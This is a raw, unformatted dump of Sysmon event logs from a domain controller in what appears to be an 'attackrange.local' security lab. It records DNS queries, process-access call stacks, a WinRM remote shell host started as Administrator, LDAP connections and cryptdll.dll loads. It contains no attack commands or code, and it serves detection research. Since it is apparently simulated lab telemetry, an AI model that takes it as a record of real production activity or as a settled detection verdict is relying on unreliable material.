;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.703{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-646A-6064-0B00-00000000AE01}856_msdcs.attackrange.local.0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.700{266CAFBE-646A-6064-0B00-00000000AE01}856_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.700{266CAFBE-646A-6064-0B00-00000000AE01}856aee535c1-ccd6-4bd4-b690-6b3c4705ab7f._msdcs.attackrange.local.0type: 5 win-dc-892.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.698{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ab7030e6-8d8e-4379-abb8-78db4f8810c9.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.696{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.691{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.691{266CAFBE-646C-6064-1500-00000000AE01}1316eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-647D-6064-3200-00000000AE01}2716attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-646C-6064-1000-00000000AE01}1124win10.ipv6.microsoft.com.9502-C:\Windows\System32\svchost.exe 22542200x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-647D-6064-3200-00000000AE01}2716attackrange.local0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-647D-6064-3200-00000000AE01}2716win-dc-892.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646C-6064-1100-00000000AE01}1200attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646C-6064-1500-00000000AE01}1316_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.233{266CAFBE-647D-6064-3200-00000000AE01}2716win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.228{266CAFBE-646A-6064-0B00-00000000AE01}856WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.002{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6495-6064-8000-00000000AE01}4268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-1500-00000000AE01}13161680C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.999{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-648A-6064-DA02-060000000000}0x602da0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.736{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=68BCDF1212B476DB3583BD35A962B691,SHA256=7BEAC708211278D0A0B6C5C8C3F194B3E379B1696BDA8D3B87FA29AD891D2AF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.578{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49720-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.578{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49720-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.575{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49719-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.575{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49719-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.557{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49718-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.557{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49718-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 734700x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.581{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.268{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.564{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.564{266CAFBE-6495-6064-8100-00000000AE01}4272win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.735{266CAFBE-646C-6064-1000-00000000AE01}1124win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 